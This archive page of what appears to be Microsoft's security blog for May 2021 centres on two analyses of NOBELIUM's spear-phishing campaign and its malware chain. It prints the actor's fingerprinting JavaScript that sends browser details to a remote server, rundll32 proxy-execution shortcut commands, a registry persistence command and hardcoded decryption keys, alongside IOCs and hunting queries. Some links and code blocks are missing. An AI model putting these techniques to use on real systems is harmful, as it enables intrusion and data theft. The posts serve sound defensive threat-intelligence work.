Archive for May, 2021

Breaking down NOBELIUM’s latest early-stage toolset

May 28th, 2021 No comments

As we reported in earlier blog posts, the threat actor NOBELIUM recently intensified an email-based attack that it has been operating and evolving since early 2021. We continue to monitor this active attack and intend to post additional details as they become available. In this blog, we highlight four tools representing a unique infection chain utilized by NOBELIUM: EnvyScout, BoomBox, NativeZone, and VaporRage. These tools have been observed being used in the wild as early as February 2021 attempting to gain a foothold on a variety of sensitive diplomatic and government entities.

As part of this blog, Microsoft Threat Intelligence Center (MSTIC) is releasing an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations. The NOBELIUM IOCs associated with this activity are available in CSV on the MSTIC GitHub. This sophisticated NOBELIUM attack requires a comprehensive incident response to identify, investigate, and respond. Get the latest information and guidance from Microsoft at We have also outlined related alerts in Microsoft 365 Defender, so that security teams can check to see if activity has been flagged for investigation.

Each of the NOBELIUM tools discussed in this blog is designed for flexibility, enabling the actor to adapt to operational challenges over time. While its technical specifics are not unprecedented, NOBELIUM’s operational security priorities have likely influenced the design of this toolset, which demonstrate preferable features for an actor operating in potentially high-risk and high-visibility environments. These attacker security priorities are:

  • Use of trusted channels: BoomBox is a uniquely developed downloader used to obtain a later-stage payload from an actor-controlled Dropbox account. All initial communications leverage the Dropbox API via HTTPS.
  • Opportunity for restraint: Consistent with other tools utilized by NOBELIUM, BoomBox, VaporRage, and some variants of NativeZone conduct some level of profiling on an affected system’s environment. MSTIC is currently unaware if these tools benefit from any server-side component. It is plausible that this design may allow NOBELIUM to selectively choose its targets and gain a level of understanding of potential discovery should the implant be run in environments unfamiliar to the actor.
  • Ambiguity: VaporRage is a unique shellcode loader seen as the third-stage payload. VaporRage can download, decode, and execute an arbitrary payload fully in-memory. Such design and deployment patterns, which also include staging of payloads on a compromised website, hamper traditional artifacts and forensic investigations, allowing for unique payloads to remain undiscovered.

NOBELIUM is an actor that operates with rapid operational tempo, often leveraging temporary infrastructure, payloads, and methods to obfuscate their activities. We suspect that NOBELIUM can draw from significant operational resources that are often showcased in their periodic campaigns. Since December, the security community has identified a growing collection of payloads attributed to the actor, including the GoldMax, GoldFinder, and Sibot malware identified by Microsoft, as well as TEARDROP (FireEye), SUNSPOT (CrowdStrike), Raindrop (Symantec) and, most recently, FLIPFLOP (Volexity).

Since the exposure of the SolarWinds attack in late 2020 and despite growing community visibility, NOBELIUM has continued to target government and diplomatic entities across the globe. We anticipate that as these operations progress, NOBELIUM will continue to mature their tools and tactics to target a global audience.

While this post focuses on a single wave of the campaign comprised of the mentioned four malware families, it also highlights variations in the campaign wherein methodologies were altered per wave. The list of indicators in the appendix expands beyond this single wave.

EnvyScout: NV.html (malicious HTML file)

NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails.

The HTML <body> section of NV.html contains four notable components:

Component #1: Tracking and credential-harvesting URLs

In one variant of EnvyScout, the <body> section contains two URLs, as shown above.

The first, prefixed with a file:// protocol handler, is indicative of an attempt to coax the operating system to send sensitive NTLMv2 material to the specified actor-controlled IP address over port 445. It is likely that the attacker is running a credential capturing service, such as Responder, at the other end of these transactions. Later, brute-forcing of these credentials may result in their exposure.

The second URL, which resolves to the same IP address as the former at the time of analysis, remotely sources an image that is part of the HTML lure. This technique, sometimes referred to as a “web bug”, serves as a read receipt of sorts to NOBELIUM, validating that the prospective target followed through with opening the malicious attachment.

Component #2: FileSaver JavaScript helper code

The second portion of EnvyScout is a modified version of the open-source tool FileSaver, which is intended to assist in the writing of files to disk via JavaScript. The code is borrowed directly from the publicly available variants with minor alterations, including whitespace removal, conversion of hex parameters to decimal, and renamed variables. By combining this code with components #3 and #4 detailed below, NOBELIUM effectively implements a methodology known as HTML smuggling. This methodology may circumvent static analysis of known malicious file types by obscuring them within dynamically altered content upon execution. When combined with dynamic analysis guardrails, this can be an effective way to subvert detections of both types.

Component #3: Obfuscated ISO file

The third section of EnvyScout contains a payload stored as an encoded blob. This payload is decoded by XOR’ng each character with a single-byte key, which then leads to a Base64 payload that is then decoded and written to disk via components #2 and #4.

Component #4: De-obfuscator and dropper script

The final component of EnvyScout is a short code snippet responsible for decoding the ISO in the Base64 encoded/XOR’d blob, and saving it to disk as NV.img with a mime type of “application/octet-stream”. At this stage of infection, the user is expected to open the downloaded ISO, NV.img, by double clicking it.

As Microsoft has been tracking waves of this campaign for months, we have identified various modifications to the actor’s toolkit that were not present in every instance of EnvyScount but are nonetheless notable for defenders:

EnvyScout variation #1:

In some iterations of the actor’s phishing campaigns, EnvyScout contained execution guardrails wherein window.location.pathname was called, and its values were leveraged to ensure that the first two entries in the array of characters returned were “C” and “:”. If this condition was not met—indicating the sample was not being executed from the C: drive—the embedded ISO was not written to disk.

As the attacker had gathered qualities from detonations of previous entries in the campaign via the Firebase fingerprinting JavaScript detailed in a prior blog post, this was assessed to be an execution guardrail to deter analysis and dynamic execution of the samples bearing these guardrails. Having witnessed both iterations of EnvyScout in the wild allows us to infer the intent of some of the information gathered from earlier instances.

EnvyScout variation #2:

In at least one instance of EnvyScout delivery, we observed further enumeration of the executing browser’s environment, wherein the user-agent was used to determine whether a Windows machine received an ISO payload. If the visitor arrived via iOS, they were redirected to external infrastructure.

NV.img (malicious ISO file)

When a target user opens NV.img (dropped by EnvyScout) by double-clicking it, the default behavior on Windows 10 is to mount the ISO image at the next available drive letter. Windows Explorer subsequently displays the contents of the mounted ISO in a window, similar to what users see when they open folders or compressed archives.

As shown above, the mounted ISO contains a single visible file, a shortcut file named NV. However, adjusting the file and folder settings in Windows to show hidden files and folders exposes a hidden folder named NV and a hidden executable named BOOM.exe:

The user is likely expected to interact with NV.lnk, but manual execution of the hidden file BOOM.exe also results in the infection of the system. The individual contents of each file are detailed below.

The use of ISO as a vessel for malicious payloads is further notable due to the lack of mark of the web propagation on the contents, which may impact both host-based detections and reduce friction to user interaction with the contents.

NV.pdf (decoy document)

The hidden NV directory in the mounted ISO contains a decoy PDF file named NV.pdf which contains a decoy advisory:

As described later in this analysis, the contents of the NV directory are displayed to the user by BOOM.exe.

NV.lnk (malicious shortcut)

NV.lnk is a shortcut/launcher for the hidden file BOOM.exe. As shown below, the shortcut leverages a living-off-the-land binary (LOLBin) and technique to proxy the execution of BOOM.exe using the following hardcoded shortcut target value: C:\Windows\System32\rundll32.exe c:\windows\system32\advpack.dll,RegisterOCX BOOM.exe.

Note that Microsoft also saw a variation of this LNK file containing the following shortcut target value: C:\Windows\System32\cmd.exe /c start BOOM.exe.

Numerous other LNKs were identified and are referenced in the appendix linked in this post. Methodologies varied, as did metadata in the LNKs themselves. For instance, the sample with the SHA-256: 48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 contained a target of “%windir%/system32/explorer.exe Documents.dll,Open”, while the absolute path in the sample was “C:\Windows\system32\rundll32.exe”.

As referenced in Volexity’s blog post on the latest campaign, the LNK metadata was widely removed, and what remained varied between waves. Icons were often folders, meant to trick targets into thinking they were opening a shortcut to a folder.

Microsoft also observed the following targets for known LNK files:

  • C:\Windows\System32\rundll32.exe IMGMountingService.dll MountImgHelper
  • C:\Windows\System32\rundll32.exe diassvcs.dll InitializeComponent
  • C:\Windows\System32\rundll32.exe MsDiskMountService.dll DiskDriveIni
  • C:\Windows\system32\rundll32.exe data/mstu.dll,MicrosoftUpdateService

BoomBox: BOOM.exe (malicious downloader)

BOOM.exe, tracked by Microsoft as “BoomBox”, can be best described as a malicious downloader. The downloader is responsible for downloading and executing the next-stage components of the infection. These components are downloaded from Dropbox (using a hardcoded Dropbox Bearer/Access token).

When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file).

Next, BoomBox ensures that the following file is not present on the system (if so, it terminates): %AppData%\Microsoft\NativeCache\NativeCacheSvc.dll (this file is covered later in this analysis). BoomBox performs enumeration of various victim host qualities, such as hostname, domain name, IP address, and username of the victim system to compile the following string (using example values):

Next, BoomBox AES-encrypts the host information string above using the hardcoded encryption key “123do3y4r378o5t34onf7t3o573tfo73” and initialization vector (IV) value “1233t04p7jn3n4rg”. To masquerade the data as contents of a PDF file, BoomBox prepends and appends the magic markers for PDF to the AES-encrypted host information string above:

BoomBox proceeds to upload the data above (masquerading as a PDF file) to a dedicated-per-victim-system folder in Dropbox. For demonstration purposes, an example HTTP(s) POST request used to upload the file/data to Dropbox is included below.

To ensure the file has been successfully uploaded to Dropbox, BoomBox utilizes a set of regular expression values to check the HTTP response from Dropbox. As shown below, the regular expressions are used to check the presence of the is_downloadable, path_lower, content_hash, and size fields (not their values) in the HTTP response received from Dropbox. Notably, BoomBox disregards the outcome of this check and proceeds, even if the upload operation is unsuccessful.

Next, BoomBox downloads an encrypted file from Dropbox. For demonstration purposes, an example HTTP(s) POST request used to download the encrypted file from Dropbox is shown below.

After successfully downloading the encrypted file from Dropbox, BoomBox discards the first 10 bytes from the header and 7 bytes from the footer of the encrypted file, and then AES-decrypts the rest of the file using the hardcoded encryption key “123do3y4r378o5t34onf7t3o573tfo73” and IV value “1233t04p7jn3n4rg”. BoomBox writes the decrypted file to the file system at %AppData%\Microsoft\NativeCache\NativeCacheSvc.dll. It then establishes persistence for NativeCacheSvc.dll by creating a Run registry value named MicroNativeCacheSvc:


The Run registry value is populated with the following command, which is used to execute NativeCacheSvc.dll using rundll32.exe and by calling its export function named “_configNativeCache”:

rundll32.exe %AppData%\Microsoft\NativeCache\NativeCacheSvc.dll _configNativeCache

Next, BoomBox downloads a second encrypted file from the Dropbox path /tmp/readme.pdf, discards the first 10 bytes from the header and 7 bytes from the footer of the encrypted file, and then AES-decrypts the rest of the file (using the same AES IV and key as above). It writes the decrypted file at %AppData%\SystemCertificates\CertPKIProvider.dll and proceeds to execute the previously dropped file NativeCacheSvc.dll using the same rundll32.exe command as above.

As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person)).

The enumerated data is AES-encrypted (using the same IV and key as before), encapsulated in a fake PDF file (as previously described), and uploaded to the Dropbox path /new/<Victim_ID>, where <Victim_ID> is the MD5 hash of the victim’s system name, for example: /new/432B65EF29F84E6043A80C15EBA12FD2.

NativeZone: NativeCacheSvc.dll (malicious loader)

NativeCacheSvc.dll, tracked by Microsoft as “NativeZone” can best be described as a malicious loader responsible for utilizing rundll32.exe to load the malicious downloader component CertPKIProvider.dll.

The malicious functionality of NativeCacheSvc.dll is located inside a DLL export named configNativeCache.

As shown above, the export function executes rundll32.exe to load %AppData%\SystemCertificates\Lib\CertPKIProvider.dll by calling its export function named eglGetConfigs.

VaporRage: CertPKIProvider.dll (malicious downloader)

CertPKIProvider.dll, tracked by Microsoft as “VaporRage” can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL.

As mentioned in the previous section, NativeZone utilizes rundll32.exe to execute the eglGetConfigs export function of CertPKIProvider.dll. Upon execution, the export function first ensures the NativeZone DLL %AppData%\Microsoft\NativeCache\NativeCacheSvc.dll is present on the system (else it terminates). Next, the export function issues an HTTP(s) GET request to a legitimate but compromised WordPress site holescontracting[.]com. The GET request is comprised of the dynamically generated and hardcoded values, for example:

The purpose of the GET request is to first register the system as compromised and then to download an XOR-encoded shellcode blob from the WordPress site (only if the system is of interest to the actor). Once successfully downloaded, the export function XOR decodes the shellcode blob (using a hardcoded multi-byte XOR key “346hrfyfsvvu235632542834”).

It then proceeds to execute the decoded shellcode in memory by jumping to the beginning of the shellcode blob in an executable memory region. The download-decode-execute process is repeated indefinitely, approximately every hour, until the DLL is unloaded from memory. VaporRage can execute any compatible shellcode provided by its C2 server, including a Cobalt Strike stage shellcode.

Additional Custom Cobalt Strike loader from NOBELIUM

As described in a previous blog, NOBELIUM has used multiple custom Cobalt Strike Beacon loaders (likely generated using custom Artifact Kit templates) to enable their malicious activities. These include TEARDROP, Raindrop, and other custom loaders.

Since our last publication, we have identified additional variants of NOBELIUM’s custom Cobalt Strike loaders. Instead of assigning a name to each short-lived and disposable variant, Microsoft will be tracking NOBELIUM’s custom Cobalt Strike loaders and downloaders for the loaders under the name NativeZone. As seen in previous custom NOBELIUM Cobalt Strike loaders, the new loader DLLs also contain decoy export names and function, as well as code and strings borrowed from legitimate applications.

The new NativeZone loaders can be grouped into two variants:

  • Variant #1: These loaders embed an encoded/encrypted Cobalt Strike Beacon stage shellcode
  • Variant #2: These loaders load an encoded/encrypted Cobalt Strike Beacon stage shellcode from another accompanying file (e.g., an RTF file).

In the succeeding sections, we discuss some of the new NativeZone Cobalt Strike Beacon variants we have observed in our investigation.

NativeZone variant #1

Similar to the previous NOBELIUM custom Cobalt Strike loaders, such as TEARDROP and Raindrop, these NativeZone loaders are responsible for decoding/decrypting an embedded Cobalt Strike Beacon stage shellcode and executing it in memory. Some of the NativeZone loaders feature anti-analysis guardrails to thwart analysis of the samples.

In these versions of NativeZone, the actor has used a variety of encoding and encryption methodologies to obfuscate the embedded shellcode. For example, in the example below, the NativeZone variant uses a simple byte-swap decoding algorithm to decode the embedded shellcode:

Another sample featuring a different decoding methodology to decode the embedded shellcode is shown below:

Another sample, featuring a de-obfuscation methodology leveraging AES encryption algorithm to decrypt the embedded shellcode, is shown below:

Yet another NativeZone sample leveraging AES for decrypting an embedded Cobalt Strike shellcode blob is shown below (note the syntax differences compared to the sample above):

Another sample featuring a different decoding methodology along with leveraging CreateThreadpoolWait() to execute the decoded shellcode blob is below:

Below is an example of anti-analysis technique showing the loader checking if the victim system is a Vmware or VirtualBox VM:

NativeZone variant #2

Unlike variant #1, the NativeZone variant #2 samples do not contain the encoded/encrypted Cobalt Strike Beacon stage shellcode. Instead, these samples read the shellcode from an accompanying file that is shipped with the sample. For example, one NativeZone variant #2 sample was observed alongside an RTF file. The RTF file doubles as both a decoy document and a shellcode carrier file. The RTF file contains the proper RTF file structure and data followed by an encoded shellcode blob (starting at offset 0x658):

When the NativeZone DLL is loaded/executed, it first displays the RTF document to the user.

As mentioned above, the same RTF also contains the encoded Cobalt Strike stage shellcode. As shown below, the NativeZone DLL proceeds to extract the shellcode from the RTF file (starting at file offset 0x658 as shown above), decode the shellcode and execute it on the victim system:

Notes on new and old NOBELIUM PDB paths

The following example PDB paths were observed in the samples analyzed in this blog:

  • BoomBox: C:\Users\dev10vs\Desktop\Prog\Obj\BOOM\BOOM\BOOM\obj\Release\BOOM.pdb
  • NativeZone: c:\users\devuser\documents\visual studio 2013\Projects\DLL_stageless\Release\DLL_stageless.pdb
  • NativeZone: C:\Users\DevUser\Documents\Visual Studio 2013\Projects\DLL_stageless\Release\DLL_stageless.pdb
  • NativeZone: C:\Users\dev\Desktop\나타나게 하다\Dll6\x64\Release\Dll6.pdb

Note the presence of ‘dev’ user in the PDB paths above. A ‘dev’ username was previously observed in the PDB path of a NOBELIUM Cobalt Strike loader mentioned in our previous blog: c:\build\workspace\cobalt_cryptor_far (dev071)\farmanager\far\platform.concurrency.hpp.

Comprehensive protections for persistence techniques

The sophisticated NOBELIUM attack requires a comprehensive incident response to identify, investigate, and respond. Get the latest information and guidance from Microsoft at

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects the new NOBELIUM components discussed in this blog as the following malware:

  • TrojanDropper:JS/EnvyScout.A!dha
  • TrojanDownloader:Win32/BoomBox.A!dha
  • Trojan:Win32/NativeZone.A!dha
  • Trojan:Win32/NativeZone.B!dha
  • Trojan:Win32/NativeZone.C!dha
  • Trojan:Win32/NativeZone.D!dha
  • TrojanDownloader:Win32/VaporRage.A!dha

Microsoft Defender for Endpoint (EDR)

Alerts with the following titles in the Security Center can indicate threat activity on your network:

  • Malicious ISO File used by NOBELIUM
  • Cobalt Strike Beacon used by NOBELIUM
  • Cobalt Strike network infrastructure used by NOBELIUM

The following alerts might also indicate threat activity associated with this threat. The below alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • An uncommon file was created and added to startup folder
  • A link file (LNK) with unusual characteristics was opened

Azure Sentinel

We have updated the related Azure Sentinel query to include these additional indicators. Azure Sentinel customers can access this query in this GitHub repository.

Indicators of compromise (IOCs)

The NOBELIUM IOCs associated with this activity are available in CSV on the MSTIC GitHub.

The post Breaking down NOBELIUM’s latest early-stage toolset appeared first on Microsoft Security.

Security baseline for Microsoft Edge version 91

May 28th, 2021 No comments

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge, version 91!


We have reviewed the new settings in Microsoft Edge version 91 and determined that there are no additional security settings that require enforcement. The settings from the Microsoft Edge version 88 package continues to be our recommended baseline. That baseline package can be downloaded from the Microsoft Security Compliance Toolkit.


Microsoft Edge version 91 introduced 7 new computer settings, 7 new user settings. We have attached a spreadsheet listing the new settings to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baselines Discussion site or this post.

Categories: Uncategorized Tags:

New sophisticated email-based attack from NOBELIUM

May 28th, 2021 No comments

Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact, to masquerade as a US-based development organization to distribute malicious URLs to a wide variety of organizations and industry verticals.

Microsoft is issuing this alert and new security research regarding this sophisticated email-based campaign that NOBELIUM has been operating to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the Microsoft On The Issues blog.

Note: This is an active incident. We will post more details here as they become available.

NOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an established pattern of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.

This new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service’s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.

Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and take the actions described below in this article.

We continue to see an increase in sophisticated and nation-state-sponsored attacks and, as part of our ongoing threat research and efforts to protect customers, we will continue to provide guidance to the security community on how to secure against and respond to sophisticated multi-dimensional attacks.

Spear phishing campaign delivers NOBELIUM payloads

The NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly when compared to NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that the observations represent changes in the actor’s tradecraft and possible experimentation following widespread disclosures of previous incidents. 

Early testing and initial discovery

As part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC tracked the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.

Evolving delivery techniques

In the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in it being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the host.


Example Flow of HMTL/ISO infection chain.

Figure 1. Example Flow of HMTL/ISO infection chain.

Example of target fingerprinting code leveraging Firebase:

try {
let sdfgfghj = '';
let kjhyui = new XMLHttpRequest();'GET', '', false);
kjhyui.onreadystatechange = function (){
sdfgfghj = this.responseText;
let ioiolertsfsd = navigator.userAgent;
let uyio = window.location.pathname.replace('/','');
var ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};
ctryur = JSON.stringify(ctryur);
let sdfghfgh = new XMLHttpRequest();'POST', '', false);
sdfghfgh.setRequestHeader('Content-Type', 'application/json');
} catch (e) {}

Similar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.

The phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.

Escalated targeting and delivery

Experimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.

In May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.

On May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.

In the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID <>, while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in, and (which varies for each recipient), and a Reply-To address of <> was observed. The emails seen pose as an alert from USAID, as seen below.

Example email screenshot.

Figure 2. Example email screenshot.

If the user clicked on the link in the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:


However, the user is then redirected to NOBELIUM-controlled infrastructure, with a URL following the pattern shown below:


A malicious ISO file is then delivered to the target’s computer. Within this ISO file are the following files that are saved in the %USER%\AppData\Local\Temp\<random folder name>\ path:

  • A shortcut, such as Reports.lnk, that executes a custom Cobalt Strike Beacon loader.
  • A decoy document, such as ica-declass.pdf, that is displayed to the target.
  • A DLL, such as Document.dll, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft.

The successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised machines. Then, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.

IOCs for the campaign occurring on May 25 are provided in this blog for use by security teams to help identify actor activity.

Microsoft security researchers assess that the NOBELIUM’s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.

Microsoft continues to monitor evolving this threat actor’s activities and will update as necessary. Microsoft t365 Defender delivers coordinated defense against this threat. Microsoft Defender for Office 365 detects the malicious emails, and Microsoft Defender for Endpoints detects the malware and malicious behaviors. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.

ISO file contents with hidden "Documents.dll" inside.

Figure 3. ISO file contents – Worth noting that the “Documents.dll” is a hidden file.

Shortcut which executes the hidden DLL file.

Figure 4. Shortcut which executes the hidden DLL file.

The end result when detonating the LNK file is the execution of “C:\Windows\system32\rundll32.exe Documents.dll,Open”.


Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.
  • Enable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to secure your accounts.
  • For Office 365 users, see multifactor authentication support.
  • For Consumer and Personal email accounts, see how to use two-step verification.
  • Turn on the following attack surface reduction rule to block or audit activity associated with this threat: Block all Office applications from creating child processes. NOTE: Assess rule impact before deployment.

Indicators of compromise (IOC)

This attack is still active, so these indicators should not be considered exhaustive for this observed activity.

These indicators of compromise are from the large-scale campaign launched on May 25, 2021.


INDICATOR TYPE DESCRIPTION Email Spoofed email account Email Spoofed email account
2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 SHA-256 Malicious ISO file (container)
d035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 SHA-256 Malicious ISO file (container)
94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 SHA-256 Malicious ISO file (container)
48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 SHA-256 Malicious shortcut (LNK)
ee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c SHA-256 Cobalt Strike Beacon malware
ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 SHA-256 Cobalt Strike Beacon malware
usaid.theyardservice[.]com Domain Subdomain used to distribute ISO file
worldhomeoutlet[.]com Domain Subdomain in Cobalt Strike C2
dataplane.theyardservice[.]com Domain Subdomain in Cobalt Strike C2
cdn.theyardservice[.]com Domain Subdomain in Cobalt Strike C2
static.theyardservice[.]com Domain Subdomain in Cobalt Strike C2
192[.]99[.]221[.]77 IP address IP resolved to by worldhomeoutlet[.]com
83[.]171[.]237[.]173 IP address IP resolved to by *theyardservice[.]com
theyardservice[.]com Domain Actor controlled domain

Detection details


Microsoft Defender Antivirus detects threat components as the following malware:

Endpoint Detection and Response (EDR)

Alerts with the following titles in the Security Center can indicate threat activity on your network:

  • Malicious ISO File used by NOBELIUM.
  • Cobalt Strike Beacon used by NOBELIUM.
  • Cobalt Strike network infrastructure used by NOBELIUM.

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • An uncommon file was created and added to startup folder.
  • A link file (LNK) with unusual characteristics was opened.

Advanced hunting

Microsoft 365 Defender

The following sample queries lets you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential NOBELIUM email campaign-related indicators for more than a week, go to the Advanced Hunting page > Query tab, select the calendar drop-down menu to update your query to hunt for the Last 30 days.

To locate possible exploitation activity, run the following queries in the Microsoft 365 security center.

Azure Sentinel

Azure Sentinel customers can find a Sentinel query containing these indicators in this GitHub repository.

NOBELIUM Abuse of USAID Constant Contact resources in email data

Looks for a recent mail to the organization that originates from Constant Contact original sending infrastructure and from specifically the accounts spoofed or compromised in the campaign detailed in this report. That secondary account can be adjusted if new accounts arise. Then the query examines whether or not the mail is accompanied by a URL which redirects the user to file hosting by Constant Contact which will be used to download the malicious files. Query can be adjusted with additional URLs or joined further to the attachment tables if attachment methods such as HTML documents are utilized again in the future.

| where UrlDomain has ""
| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId
| where SenderMailFromAddress endswith ""
| where SenderFromAddress endswith ""

MITRE ATT&CK techniques observed

This threat makes use of attacker techniques documented in the MITRE ATT&CK framework.

Initial access


Command and control

  • T1071.001 Application Layer Protocol: Web Protocols—Cobalt Strike Beacons call out to attacker infrastructure via port 443.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post New sophisticated email-based attack from NOBELIUM appeared first on Microsoft Security.

How user experience is shaping verifiable credentials and identity

May 26th, 2021 No comments

Since 2017, Microsoft has been working with the identity community on two groundbreaking technologies designed from the ground up to make digital privacy convenient and practical: decentralized identifiers and verifiable credentials. We believe verifiable credentials will revolutionize the way we exchange personal information, shifting ownership and control of identity and personal data back to individuals.

To develop our implementation, Frank Chiachiere and other members of our team conducted pilots with industry leaders in healthcare, the public sector, financial services, retail, professional sports, and education. As Frank explains in the below interview with Alex Simons, the team started with optimistic ideas that evolved into a tangible working model, now in preview.

What I love most about Frank’s story is that he came to our team with an unusual background that trained him not only on technology but also on empathizing with people to understand what motivates them. This training helps him collaborate broadly on designing natural, responsive, and inviting user experiences that seamlessly integrate into familiar workflows and habits.

Frank’s interview with Alex has been edited for clarity and length. We’ve included some video snippets so you can learn more about Frank’s journey and his UX design philosophy.

Alex: Frank, you’ve been working on some of the coolest stuff in the division. But before we get to that, I’d love for you to share your background, because it’s not the traditional way to get into high-tech.

